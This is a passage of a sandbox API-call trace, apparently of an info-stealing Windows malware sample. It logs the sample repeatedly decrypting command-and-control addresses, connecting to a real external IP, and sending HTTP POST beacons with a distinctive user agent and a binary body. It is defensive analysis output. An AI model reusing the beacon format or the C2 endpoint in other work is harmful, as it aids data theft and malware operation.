lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x724) returned 0x388 [0190.605] Sleep (dwMilliseconds=0xea60) [0190.606] GetProcessHeap () returned 0x690000 [0190.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0190.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.608] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0190.622] GetProcessHeap () returned 0x690000 [0190.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0190.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.623] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.625] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.625] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.625] GetProcessHeap () returned 0x690000 [0190.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0190.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.627] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0190.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.628] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.629] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0190.629] GetProcessHeap () returned 0x690000 [0190.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0190.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.632] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.633] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.634] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.635] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.635] GetProcessHeap () returned 0x690000 [0190.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0190.635] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.636] GetProcessHeap () returned 0x690000 [0190.636] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0190.640] GetProcessHeap () returned 0x690000 [0190.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.640] GetProcessHeap () returned 0x690000 [0190.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0190.643] GetProcessHeap () returned 0x690000 [0190.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0190.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0190.664] GetProcessHeap () returned 0x690000 [0190.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0190.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.668] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0190.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.670] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.671] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.671] GetProcessHeap () returned 0x690000 [0190.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0190.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.673] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0190.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.676] CryptDestroyKey (hKey=0x69d028) returned 1 [0190.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.678] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0190.678] GetProcessHeap () returned 0x690000 [0190.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.679] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0190.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.680] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0190.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.681] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0190.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0190.682] GetProcessHeap () returned 0x690000 [0190.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.682] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a97d0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0190.682] GetProcessHeap () returned 0x690000 [0190.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0190.683] socket (af=2, type=1, protocol=6) returned 0x38c [0190.683] connect (s=0x38c, name=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0190.734] FreeAddrInfoW (pAddrInfo=0x6a97d0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0190.734] GetProcessHeap () returned 0x690000 [0190.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0190.737] GetProcessHeap () returned 0x690000 [0190.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0190.738] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.738] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.738] GetProcessHeap () returned 0x690000 [0190.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0190.739] GetProcessHeap () returned 0x690000 [0190.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.739] GetProcessHeap () returned 0x690000 [0190.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0190.739] GetProcessHeap () returned 0x690000 [0190.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0190.740] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.740] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.740] GetProcessHeap () returned 0x690000 [0190.740] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0190.741] GetProcessHeap () returned 0x690000 [0190.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.741] send (s=0x38c, buf=0x6abd08*, len=242, flags=0) returned 242 [0190.742] send (s=0x38c, buf=0x6aba40*, len=159, flags=0) returned 159 [0190.742] GetProcessHeap () returned 0x690000 [0190.742] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0190.742] recv (in: s=0x38c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0190.818] GetProcessHeap () returned 0x690000 [0190.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.818] GetProcessHeap () returned 0x690000 [0190.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0190.819] GetProcessHeap () returned 0x690000 [0190.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0190.819] GetProcessHeap () returned 0x690000 [0190.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0190.820] closesocket (s=0x38c) returned 0 [0190.821] GetProcessHeap () returned 0x690000 [0190.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0190.821] GetProcessHeap () returned 0x690000 [0190.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.821] GetProcessHeap () returned 0x690000 [0190.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.822] GetProcessHeap () returned 0x690000 [0190.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfc4) returned 0x38c [0190.824] Sleep (dwMilliseconds=0xea60) [0190.825] GetProcessHeap () returned 0x690000 [0190.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0190.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.826] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0190.839] GetProcessHeap () returned 0x690000 [0190.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0190.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.840] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0190.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.842] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.843] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.843] GetProcessHeap () returned 0x690000 [0190.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0190.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.845] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0190.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.846] CryptDestroyKey (hKey=0x69d028) returned 1 [0190.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.848] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0190.848] GetProcessHeap () returned 0x690000 [0190.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0190.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.849] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.851] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.857] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.857] GetProcessHeap () returned 0x690000 [0190.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0190.857] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.857] GetProcessHeap () returned 0x690000 [0190.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0190.858] GetProcessHeap () returned 0x690000 [0190.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.858] GetProcessHeap () returned 0x690000 [0190.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.858] GetProcessHeap () returned 0x690000 [0190.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0190.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.867] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0190.874] GetProcessHeap () returned 0x690000 [0190.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0190.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.876] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0190.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.877] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.878] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.878] GetProcessHeap () returned 0x690000 [0190.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0190.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.880] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0190.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.881] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0190.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.882] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0190.882] GetProcessHeap () returned 0x690000 [0190.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.883] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0190.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.885] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0190.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.886] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0190.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0190.887] GetProcessHeap () returned 0x690000 [0190.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0190.887] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0190.887] GetProcessHeap () returned 0x690000 [0190.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0190.887] socket (af=2, type=1, protocol=6) returned 0x390 [0190.887] connect (s=0x390, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0190.911] FreeAddrInfoW (pAddrInfo=0x6b2c90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0190.911] GetProcessHeap () returned 0x690000 [0190.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0190.911] GetProcessHeap () returned 0x690000 [0190.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0190.911] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.912] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.912] GetProcessHeap () returned 0x690000 [0190.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0190.912] GetProcessHeap () returned 0x690000 [0190.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.913] GetProcessHeap () returned 0x690000 [0190.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0190.913] GetProcessHeap () returned 0x690000 [0190.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0190.914] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.915] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.915] GetProcessHeap () returned 0x690000 [0190.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0190.915] GetProcessHeap () returned 0x690000 [0190.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.915] send (s=0x390, buf=0x6abd08*, len=242, flags=0) returned 242 [0190.916] send (s=0x390, buf=0x6aba40*, len=159, flags=0) returned 159 [0190.916] GetProcessHeap () returned 0x690000 [0190.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0190.916] recv (in: s=0x390, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0190.997] GetProcessHeap () returned 0x690000 [0190.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.998] GetProcessHeap () returned 0x690000 [0190.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.998] GetProcessHeap () returned 0x690000 [0190.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0190.998] GetProcessHeap () returned 0x690000 [0190.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0190.999] closesocket (s=0x390) returned 0 [0190.999] GetProcessHeap () returned 0x690000 [0190.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0190.999] GetProcessHeap () returned 0x690000 [0190.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.000] GetProcessHeap () returned 0x690000 [0191.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0191.001] GetProcessHeap () returned 0x690000 [0191.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0191.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc6c) returned 0x390 [0191.003] Sleep (dwMilliseconds=0xea60) [0191.004] GetProcessHeap () returned 0x690000 [0191.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0191.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0191.021] GetProcessHeap () returned 0x690000 [0191.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0191.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.023] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.024] LoadLibraryW 